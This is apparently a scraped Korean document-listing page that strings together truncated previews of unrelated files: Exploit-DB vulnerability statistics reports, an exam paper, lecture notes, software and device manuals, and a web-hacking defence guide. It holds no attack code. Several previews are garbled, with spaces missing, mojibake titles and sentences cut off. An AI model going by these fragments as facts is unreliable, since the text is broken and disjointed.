EDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 03월에공개된 Exploit-DB의분석결과, 해커들이가장많이시도하는공격으로알려져있는 SQL Injection 공격에대한보고개수가가장많았습니다. 무엇보다주의가필요한부분은

More information

2015학년도 고려대학교 수시모집 일반전형 논술고사

2015학년도 고려대학교 수시모집 일반전형 논술고사 2015학년도 고려대학교 수시모집 일반전형(인문계) 논술고사 1. 인문계 A 가. 출제의도 인문계 논술 A형은 더불어 사는 삶 이라는 주제를 중심으로 주제와 관계가 다 소 느슨한 제시문을 선정하였다. 제시문 1과 2는 주제와 관련하여 반성적 사유를 전개할 수 있는 사례들이다. 제시문 3은 인간의 본성에 대한 견해를 서술한 글로 써 그 글을 통해 주제와 관련된

More information

5.스택(강의자료).key

5.스택(강의자료).key CHP 5: https://www.youtube.com/watch?v=ns-r91557ds ? (stack): (LIFO:Last-In First-Out):. D C B C B C B C B (element) C (top) B (bottom) (DT) : n element : create() ::=. is_empty(s) ::=. is_full(s) ::=.

More information

1 법적 고지 사항 SK hynix Inc.는 사전 통보 없이 제품, 정보 및 사양을 변경할 권리를 보유합니다. 본 문서의 제품 및 사양은 참조용입니다. 본 문서의 모든 정보는 어떠한 형태의 보증 없이 있는 그대로 제공됩니다. 본 문서와 여기 포함된 모든 정보는 SK

1 법적 고지 사항 SK hynix Inc.는 사전 통보 없이 제품, 정보 및 사양을 변경할 권리를 보유합니다. 본 문서의 제품 및 사양은 참조용입니다. 본 문서의 모든 정보는 어떠한 형태의 보증 없이 있는 그대로 제공됩니다. 본 문서와 여기 포함된 모든 정보는 SK 데이터 마이그레이션 도구 사용자 가이드 Data Migration Tool User Guide SK kynix Inc. 2014 Rev 1.01K 1 법적 고지 사항 SK hynix Inc.는 사전 통보 없이 제품, 정보 및 사양을 변경할 권리를 보유합니다. 본 문서의 제품 및 사양은 참조용입니다. 본 문서의 모든 정보는 어떠한 형태의 보증 없이 있는 그대로

More information

atree_¸Å´º¾ó-1

atree_¸Å´º¾ó-1 2004-2007 YBM/Sisa.com All rights reserved. 1 2 4 5 1 2 3 Keeping promise with clients is all in all in the company. Believe me all in all. 4 5 www.ybmallinall.com 7 7 8 9 10 11 12 13 14 15 16 17 18 19

More information

DWCOM15/17_manual

DWCOM15/17_manual TFT-LCD MONITOR High resolution DWCOM15/17 DIGITAL WINDOW COMMUNICATION DIGITAL WINDOW COMMUNICATION 2 2 3 5 7 7 7 6 (Class B) Microsoft, Windows and Windows NT Microsoft VESA, DPMS and DDC Video Electronic

More information

CONTENTS 01 Adobe Photoshop Lightroom을 소개합니다 촬영부터 출력까지 간편한 사진 작업 (Simplify photography from shoot to finish) Adobe Photoshop Lightroom 작업공간(Workspace)

CONTENTS 01 Adobe Photoshop Lightroom을 소개합니다 촬영부터 출력까지 간편한 사진 작업 (Simplify photography from shoot to finish) Adobe Photoshop Lightroom 작업공간(Workspace) ADOBE PHOTOSHOP LIGHTROOM 글 신동향 사진 신동향, 정한진, 김석준 CONTENTS 01 Adobe Photoshop Lightroom을 소개합니다 촬영부터 출력까지 간편한 사진 작업 (Simplify photography from shoot to finish) Adobe Photoshop Lightroom 작업공간(Workspace) 02

More information

Chapter 4. LISTS

Chapter 4. LISTS 연결리스트의응용 류관희 충북대학교 1 체인연산 체인을역순으로만드는 (inverting) 연산 3 개의포인터를적절히이용하여제자리 (in place) 에서문제를해결 typedef struct listnode *listpointer; typedef struct listnode { char data; listpointer link; ; 2 체인연산 체인을역순으로만드는

More information

네이버 블로그 :: 포스트 리스트

네이버 블로그 :: 포스트 리스트 :. 4.0. 5.0. ( 8101 ) 30. ( : 2007.12.19.) 30.. 299$.. http://www.techsmith.com/camtasia.asp ( ) http://www.techsmith.com/download/camtasiatrial.asp ( ) http://download.techsmith.com/camtasiastudio/kor/500/camtasiako.msi

More information

초기 매싱 모델 크기: 12 x 9 x 3 인치 (30.5 x 22.9 x 7.6 cm) 출력 시간: 3시간 29분 색상 재현 크기: 7 x 6 x 8 인치 (17.8 x 15.2 x 20.3 cm) 출력 시간: 10시간 14분 세부 설계 연구 크기: 10 x 10 x

초기 매싱 모델 크기: 12 x 9 x 3 인치 (30.5 x 22.9 x 7.6 cm) 출력 시간: 3시간 29분 색상 재현 크기: 7 x 6 x 8 인치 (17.8 x 15.2 x 20.3 cm) 출력 시간: 10시간 14분 세부 설계 연구 크기: 10 x 10 x 가장 빠르고 가장 저렴한 컬러 3D 출력 > > 초기 매싱 모델 크기: 12 x 9 x 3 인치 (30.5 x 22.9 x 7.6 cm) 출력 시간: 3시간 29분 색상 재현 크기: 7 x 6 x 8 인치 (17.8 x 15.2 x 20.3 cm) 출력 시간: 10시간 14분 세부 설계 연구 크기: 10 x 10 x 5.5 인치 (25.4 x 25.4 x 14

More information

Tekla Structures 설치

Tekla Structures 설치 Tekla Structures 2016 설치 4 월 2016 2016 Trimble Solutions Corporation 목차 1 Tekla Structures 설치... 3 1.1 Tekla Structures 설치 기본 요건... 5 1.2 Tekla Structures 설치 폴더... 6 2 Tekla Structures 설치... 9 2.1 Tekla

More information

비디오 / 그래픽 아답터 네트워크 만약에 ArcGolbe를 사용하는 경우, 추가적인 디스크 공간 필요. ArcGlobe는 캐시파일을 생성하여 사용 24 비트 그래픽 가속기 Oepn GL 2.0 이상을 지원하는 비디오카드 최소 64 MB 이고 256 MB 이상을 메모리

비디오 / 그래픽 아답터 네트워크 만약에 ArcGolbe를 사용하는 경우, 추가적인 디스크 공간 필요. ArcGlobe는 캐시파일을 생성하여 사용 24 비트 그래픽 가속기 Oepn GL 2.0 이상을 지원하는 비디오카드 최소 64 MB 이고 256 MB 이상을 메모리 ArcGIS for Desktop 10.4 Single Use 설치가이드 Software: ArcGIS for Desktop 10.4 Platforms: Windows 10, 8.1, 7, Server 2012, Server 2008 ArcGIS for Desktop 10.4 시스템 요구사항 1. 지원 플랫폼 운영체제 최소 OS 버전 최대 OS 버전 Windows

More information

ESET NOD32 Antivirus

ESET NOD32 Antivirus ESET NOD32 ANTIVIRUS 6 사용자 설명서 (제품 버전 6.0 이상) Microsoft Windows 8 / 7 / Vista / XP / Home Server 이 문서의 최신 버전을 다운로드하려면 여기를 클릭 ESET NOD32 ANTIVIRUS Copy r ight 2013 by ESET, s pol. s r. o. ESET NOD32 Antivirus는

More information

<4D6963726F736F667420576F7264202D2045564552554E20B4DCB8BB20C1A1B0CB20B9D720C1B6C4A120B8C5B4BABEF35F76312E335F2E646F63>

<4D6963726F736F667420576F7264202D2045564552554E20B4DCB8BB20C1A1B0CB20B9D720C1B6C4A120B8C5B4BABEF35F76312E335F2E646F63> EVERUN 단말 점검 및 조치 매뉴얼(v1.3) 2008-09-04 1. 기본 점검사항 1.1 KT WIBRO CM 프로그램 정보 1.2 장치관리자 진입경로 1.2.1 시작/제어판에서 실행 1.2.2 바탕화면에서 실행 1.3 장치 관리자에서 드라이버 확인 1.3.1 WIBRO 드라이버 확인 1.3.2 Protocol 드라이버 확인 1.4 Windows 스마트

More information

User's Guide Manual

User's Guide Manual 1. 롯데 통합구매 시스템 사용자 매뉴얼 (공급사용) 2006.01-1 - 문서 이력(Revision History) Date Version Description Author(s) 2006/01 V1.0 사용자 매뉴얼 - 공급사용 롯데CFD 주) 이 사용자 안내서의 내용과 롯데 통합구매 시스템은 저작권법과 컴퓨터 프로그램 보호법으로 보호 받고 있으며, 롯데CFD의

More information

System Recovery 사용자 매뉴얼

System Recovery 사용자 매뉴얼 Samsung OS Recovery Solution 을이용하여간편하게 MagicInfo 의네트워크를설정하고시스템을백업및복원할수있습니다. 시스템시작시리모컨의 - 버튼이나키보드의 F3 키를연속해서누르면복구모드로진입한후 Samsung OS Recovery Solution 이실행됩니다. Samsung OS Recovery Solution 은키보드와리모컨을사용하여조작할수있습니다.

More information

디지털포렌식학회 논문양식

디지털포렌식학회 논문양식 Windows Transactional NTFS(TxF), Registry(TxR) 기능 연구 유 병 영, 방 제 완, 이 상 진 고려대학교 디지털포렌식연구센터 Analysis of Windows Transactional NTFS(TxF) and Transactional Registry(TxR) Byeongyeong Yoo, Jewan Bang, Sangjing

More information

untitled

untitled (Rev. 1.6) 1 1. MagicLAN.......8 1.1............8 1.2........8 1.3 MagicLAN.......10 2.........12 2.1.... 12 2.2 12 2.3....12 3. Windows 98SE/ME/2000/XP......13 3.1.....13 3.2 Windows 98SE.... 13 3.3 Windows

More information

P2WW-2642-01HNZ0

P2WW-2642-01HNZ0 P2WW-2642-01HNZ0 CardMinder 유저 가이드 시작하기 전에 CardMinder 는 이미지 스캐너를 사용하여 명함을 스캔하거나 주소 데이터 베이스로 변환시키 는 애플리케이션입니다. 이 매뉴얼에는 CardMinder 의 기능 및 창에 대한 자세한 설명 및 개요를 설명합니다. 본 매뉴얼을 표시하거나 인쇄하려면, Adobe Acrobat (7.0

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> 개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000

More information

1

1 04단원 컴퓨터 소프트웨어 1. 프로그래밍 언어 2. 시스템 소프트웨어 1/10 1. 프로그래밍 언어 1) 프로그래밍 언어 구분 각종 프로그래밍 언어에 대해 알아보는 시간을 갖도록 하겠습니다. 우리가 흔히 접하는 소프트웨어 들은 프로그래밍 언어로 만들어지는데, 프로그래밍 언어는 크게 2가지로 나눌 수 있습니다. 1 저급어 : 0과 1로 구성되어 있어, 컴퓨터가

More information

EDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

EDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04 년 09 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. 분석된 Cross

More information

DSC-S950/S980

DSC-S950/S980 디지털 카메라 사용설명서 DSC-S950/S980 KR 고급 단계의 조작에 관해서는 CD-ROM (부속)에 들어 있는 "Cyber-shot 핸드북" (PDF) 및 "Cyber-shot 고급 사용 안내"를 컴퓨터에서 참조하여 주십시오. 사용설명서 본기를 사용하시기 전에 반드시 본 사용설명서를 잘 읽으신 후에 나중에 필요할 경우를 위하여 소중히 보관하여 주십시오.

More information

=

= written by vangelis(vangelis@wowhacker.org) 0 0000 8 1000 1 0001 9 1001 2 0010 10 1010 3 0011 11 1011 4 0100 12 1100 5 0101 13 1101 6 0110 14 1110 7 0111 15 1111 110112 + 100012 = 1011002 110 0000 0101

More information

PCServerMgmt7

PCServerMgmt7 Web Windows NT/2000 Server DP&NM Lab 1 Contents 2 Windows NT Service Provider Management Application Web UI 3 . PC,, Client/Server Network 4 (1),,, PC Mainframe PC Backbone Server TCP/IP DCS PLC Network

More information

ePapyrus PDF Document

ePapyrus PDF Document 1. 의식곡, 행사곡, 시상곡, 팡파레 2. 애창곡 모음 3. 제목별 모음 4. 동요, 만화영화 주제곡, 경음악, 효과음 5. 민요, 가곡, 군가, 캐롤 6. Pop Song 7. English Kids Song 8. 일본곡 한글인터넷주소 : 반주기 노래목록집 및 노래반주기에 수록된 곡은 사전예고없이 변경 또는 삭제될 수 있습니다. 4532 4530 2491

More information

Penpower Technology Ltd. 소프트웨어 사용자 사용권 계약서 귀하에게는 본 사용권 계약서 ( 계약서 ) 에 따라 PENPOWER Technology Ltd ( PENPOWER ) 로부터 본 소프트웨어 프로그램 ( 소프트웨어 ) 를 합법 적으로 사용할 수

Penpower Technology Ltd. 소프트웨어 사용자 사용권 계약서 귀하에게는 본 사용권 계약서 ( 계약서 ) 에 따라 PENPOWER Technology Ltd ( PENPOWER ) 로부터 본 소프트웨어 프로그램 ( 소프트웨어 ) 를 합법 적으로 사용할 수 WorldocScan X 사용자 매뉴얼 버전:1.2 출시:2012.10 Penpower Technology Ltd. 소프트웨어 사용자 사용권 계약서 귀하에게는 본 사용권 계약서 ( 계약서 ) 에 따라 PENPOWER Technology Ltd ( PENPOWER ) 로부터 본 소프트웨어 프로그램 ( 소프트웨어 ) 를 합법 적으로 사용할 수 있는 사용권이 제공됩니다.

More information

다음 사항을 꼭 확인하세요! 도움말 안내 - 본 도움말에는 iodd2511 조작방법 및 활용법이 적혀 있습니다. - 본 제품 사용 전에 안전을 위한 주의사항 을 반드시 숙지하십시오. - 문제가 발생하면 문제해결 을 참조하십시오. 중요한 Data 는 항상 백업 하십시오.

다음 사항을 꼭 확인하세요! 도움말 안내 - 본 도움말에는 iodd2511 조작방법 및 활용법이 적혀 있습니다. - 본 제품 사용 전에 안전을 위한 주의사항 을 반드시 숙지하십시오. - 문제가 발생하면 문제해결 을 참조하십시오. 중요한 Data 는 항상 백업 하십시오. 메 뉴 다음 사항을 꼭 확인하세요! --------------------------------- 2p 안전을 위한 주의 사항 --------------------------------- 3p 구성품 --------------------------------- 4p 각 부분의 명칭 --------------------------------- 5p 제품의 규격

More information

Xcovery 사용설명서

Xcovery 사용설명서 ㄱ 센티리온 프리미엄 사용설명서 목 차 Chapter 1 프로그램 소개 및 기본개념 1) 시스템 복구 2) 시스템백업 3) 시스템 백업 및 시스템 복구 활용하기 4) 폴더보호 Chapter 2 프로그램 설치하기 1) 프로그램 설치 방법 2) Centillion 설치 소프트웨어 사용권 계약서 3) 제품 인증 키 입력 4) Centillion 폴더보호 5) Windows

More information

제품 소개 및 특징 제품 사용 시 주의사항 본 제품은 차량 사고 발생시의 영상과 음성을 저장하여 사고 원인을 분석하는데 도 움을 주는 차량용 영상 기록 장치입니다.! 본 제품은 개인적인 용도로만 사용하여야 하며, 사용설명서에 명시된 사 항 외에 다른 목적으로 제품을 사

제품 소개 및 특징 제품 사용 시 주의사항 본 제품은 차량 사고 발생시의 영상과 음성을 저장하여 사고 원인을 분석하는데 도 움을 주는 차량용 영상 기록 장치입니다.! 본 제품은 개인적인 용도로만 사용하여야 하며, 사용설명서에 명시된 사 항 외에 다른 목적으로 제품을 사 CONTENTS 제품소개 및 특징 3 제품사용 시 주의사항 4 기본 구성품 7 각부 명칭 및 기능 8 제품 설치 0 제품 음성 안내 제품 LED 동작 2 저장 모드별 설명 3 LCD 화면안내 5 주차감시 모드 실행 27 PC 연결/분리 및 데이터 백업 28 전용 뷰어 설치 및 실행 29 전용 뷰어 기능 설명 34 업그레이드 방법 39 SD카드 관리요령 40

More information

108 KOREA INSTITUTE OF LOCAL FINANCE

108 KOREA INSTITUTE OF LOCAL FINANCE 107 108 KOREA INSTITUTE OF LOCAL FINANCE 109 110 KOREA INSTITUTE OF LOCAL FINANCE 111 112 KOREA INSTITUTE OF LOCAL FINANCE 113 114 KOREA INSTITUTE OF LOCAL FINANCE 115 116 KOREA INSTITUTE OF LOCAL FINANCE

More information

88 KOREA INSTITUTE OF LOCAL FINANCE

88 KOREA INSTITUTE OF LOCAL FINANCE 88 KOREA INSTITUTE OF LOCAL FINANCE 89 90 KOREA INSTITUTE OF LOCAL FINANCE 91 92 KOREA INSTITUTE OF LOCAL FINANCE 93 94 KOREA INSTITUTE OF LOCAL FINANCE 95 96 KOREA INSTITUTE OF LOCAL FINANCE 97 98 KOREA

More information

설치 순서 Windows 98 SE/Me/2000/XP 1 PC를 켜고 Windows를 시작합니다. 아직 컴퓨터에 프린터를 연결하지 마십시오. 2 PC에 P-S100 CD-ROM(프 린터 드라이버)을 삽입합니다. 3 설치 프로그램을 시작합니다. q CD-ROM의 PS1

설치 순서 Windows 98 SE/Me/2000/XP 1 PC를 켜고 Windows를 시작합니다. 아직 컴퓨터에 프린터를 연결하지 마십시오. 2 PC에 P-S100 CD-ROM(프 린터 드라이버)을 삽입합니다. 3 설치 프로그램을 시작합니다. q CD-ROM의 PS1 디지털 사진 프린터 P-S100 프린터 드라이버 설치 가이드 사용하는 컴퓨터에 따라 제공된 프린터 드라이버를 설치합니다. 설치 절차 에 대한 자세한 내용은 CD-ROM의 Readme 파일을 참조하십시오. 작동 환경 Windows 호환 모델: IBM PC/AT 및 호환품 운영 체제: Windows 98 SE/Me/2000/XP (Windows 98 SE/Me/2000/XP

More information

ESET Endpoint Security

ESET Endpoint Security ESET ENDPOINT SECURITY 사용자 설명서 Microsoft Windows 8 / 7 / Vista / XP / 2000 / Home Server 이 문서의 최신 버전을 다운로드하려면 여기를 클릭 ESET ENDPOINT SECURITY Copyright 2013 by ESET, spol. s r. o. ESET Endpoint Security는

More information

Microsoft Word - ZIO-AP1500N-Manual.doc

Microsoft Word - ZIO-AP1500N-Manual.doc 목 차 사용자 설명서 1 장 제품 소개 ------------------------------ 1 2 장 제품 내용물 ---------------------------- 2 3 장 AP 연결 설정 방법 ------------------------ 3 4 장 동작 방식별 설정 방법 --------------------- 7 (1) 엑세스 포인트 모드 -----------------------

More information

일제.PDF

일제.PDF 19,.,. / Copyright 2004 by BookCosmos. All Rights Reserved. Summarized with the Permission from Publisher. ( ).,. 19 / 2005 1 / 384 / 11,000 -, - - - - - - - - -, - - - - - - - S ho rt S umma ry. ' ' '

More information

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

Microsoft Word - windows server 2003 수동설치_non pro support_.doc Windows Server 2003 수동 설치 가이드 INDEX 운영체제 설치 준비과정 1 드라이버를 위한 플로피 디스크 작성 2 드라이버를 위한 USB 메모리 작성 7 운영체제 설치 과정 14 Boot Sequence 변경 14 컨트롤러 드라이버 수동 설치 15 운영체제 설치 17 운영체제 설치 준비 과정 Windows Server 2003 에는 기본적으로

More information

<%DOC NAME%> User Manual

<%DOC NAME%> User Manual AVG Anti- Virus 2012 User Manual Do c u me n t re v is io n 2012.01 ( 27.7.2011) Copy right AV G Tec hnologies CZ, s.r.o. All rights res erv ed. All other trademarks are the property of their res pec tiv

More information

EM300_Manual.indd

EM300_Manual.indd 보증서 재중 (WITH WARRANTY CARD) EM30020100702 준 비(안전을 위한 주의사항) 안전을 위한 주의사항 샤프 전자사전을 구입해 주셔서 대단히 감사합니다. 안전하게 기기를 사용하기 위해 안전을 위한 주의사항을 반드시 읽어 주십시오. TFT 컬러LCD에 관하여 TFT 컬러 LCD는 매우 정밀한 기술로 만들어졌습니다. 화면에서 밝거나 어두운

More information

121220_워키디_상세설명서.indd

121220_워키디_상세설명서.indd www.walkie.co.kr Copyright 2012 by GC Healthcare Corp. All rights reserved. 02 03 04 05 06 07 08 AC8D good 09 10 AC8D 11 12 13 14 15 010-1234-5678 16 17 18 19 20 21 22 23 24 25 26 27 Tel: +82. 2. 1588.

More information

Microsoft Word - FunctionCall

Microsoft Word - FunctionCall Function all Mechanism /* Simple Program */ #define get_int() IN KEYOARD #define put_int(val) LD A val \ OUT MONITOR int add_two(int a, int b) { int tmp; tmp = a+b; return tmp; } local auto variable stack

More information

<C6F7C6AEB6F5B1B3C0E72E687770> 1-1. 포트란 언어의 역사 1 1-2. 포트란 언어의 실행 단계 1 1-3. 문제해결의 순서 2 1-4. Overview of Fortran 2 1-5. Use of Columns in Fortran 3 1-6. INTEGER, REAL, and CHARACTER Data Types 4 1-7. Arithmetic Expressions 4 1-8. 포트란에서의

More information

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

User Guide

User Guide HP Pocket Playlist 사용 설명서 부품 번호: 699916-AD2 제 2 판: 2013 년 1 월, 초판: 2012 년 12 월 Copyright 2012, 2013 Hewlett-Packard Development Company, L.P. Microsoft, Windows 및 Windows Vista 는 Microsoft Corporation

More information

Microsoft Word - JAVS_UDT-1_상세_메뉴얼.doc

Microsoft Word - JAVS_UDT-1_상세_메뉴얼.doc UDT-1 TRANSPORTER 한글 상세 제품 설명서 SoundPrime. 저작권 본 저작권은 Soundprime 이 소유하고 있습니다. Soundprime 의 허가 없이 정보 검색 시스템상에서 복사, 수정, 전달, 번역, 저장을 금지하며, 컴퓨터언어나 다른 어떠한 언어로도 수정될 수 없습니다. 또한 다른 형식이나 전기적, 기계적, 자기적, 광학적, 화학적,

More information

목차 제 1 장 inexio Touch Driver소개... 3 1.1 소개 및 주요 기능... 3 1.2 제품사양... 4 제 2 장 설치 및 실행... 5 2.1 설치 시 주의사항... 5 2.2 설치 권고 사양... 5 2.3 프로그램 설치... 6 2.4 하드웨

목차 제 1 장 inexio Touch Driver소개... 3 1.1 소개 및 주요 기능... 3 1.2 제품사양... 4 제 2 장 설치 및 실행... 5 2.1 설치 시 주의사항... 5 2.2 설치 권고 사양... 5 2.3 프로그램 설치... 6 2.4 하드웨 최종 수정일: 2010.01.15 inexio 적외선 터치스크린 사용 설명서 [Notes] 본 매뉴얼의 정보는 예고 없이 변경될 수 있으며 사용된 이미지가 실제와 다를 수 있습니다. 1 목차 제 1 장 inexio Touch Driver소개... 3 1.1 소개 및 주요 기능... 3 1.2 제품사양... 4 제 2 장 설치 및 실행... 5 2.1 설치 시

More information

제목을 입력하세요.

제목을 입력하세요. 1. 4 1.1. SQLGate for Oracle? 4 1.2. 4 1.3. 5 1.4. 7 2. SQLGate for Oracle 9 2.1. 9 2.2. 10 2.3. 10 2.4. 13 3. SQLGate for Oracle 15 3.1. Connection 15 Connect 15 Multi Connect 17 Disconnect 18 3.2. Query

More information

Dell과 함께라면 가능합니다. 처음 도입하는 서버 또는 두 번째로 도입하는 서버이거나 네트워크를 확장시키거나 관리 기능을 강화하는 등의 모든 요구 사항을 Dell은 지원할 수 있습니다. Dell은 특성이 각기 다른 모든 조직과 회사마다 서로 다른 시점에 서로 다른 요

Dell과 함께라면 가능합니다. 처음 도입하는 서버 또는 두 번째로 도입하는 서버이거나 네트워크를 확장시키거나 관리 기능을 강화하는 등의 모든 요구 사항을 Dell은 지원할 수 있습니다. Dell은 특성이 각기 다른 모든 조직과 회사마다 서로 다른 시점에 서로 다른 요 Dell PowerEdge 서버 포트폴리오 가이드 Dell PowerEdge 서버 안정성을 위한 설계 가상화를 지원하는 효율적인 인프라 연결된 지능형 시스템 관리 Dell과 함께라면 가능합니다. 처음 도입하는 서버 또는 두 번째로 도입하는 서버이거나 네트워크를 확장시키거나 관리 기능을 강화하는 등의 모든 요구 사항을 Dell은 지원할 수 있습니다. Dell은

More information

윈도우즈프로그래밍(1)

윈도우즈프로그래밍(1) 제어문 (2) For~Next 문 윈도우즈프로그래밍 (1) ( 신흥대학교컴퓨터정보계열 ) 2/17 Contents 학습목표 프로그램에서주어진특정문장을부분을일정횟수만큼반복해서실행하는문장으로 For~Next 문등의구조를이해하고활용할수있다. 내용 For~Next 문 다중 For 문 3/17 제어문 - FOR 문 반복문 : 프로그램에서주어진특정문장들을일정한횟수만큼반복해서실행하는문장

More information

++11월 소비자리포트-수정

++11월 소비자리포트-수정 [ Internet Security Suite ] [ FireWall ] [ AntiVirus ] 00 www.sobijareport.org 7 Performance Ease of use Start duration Resource use Default settings Password protection Firewall functions Antivirus functions

More information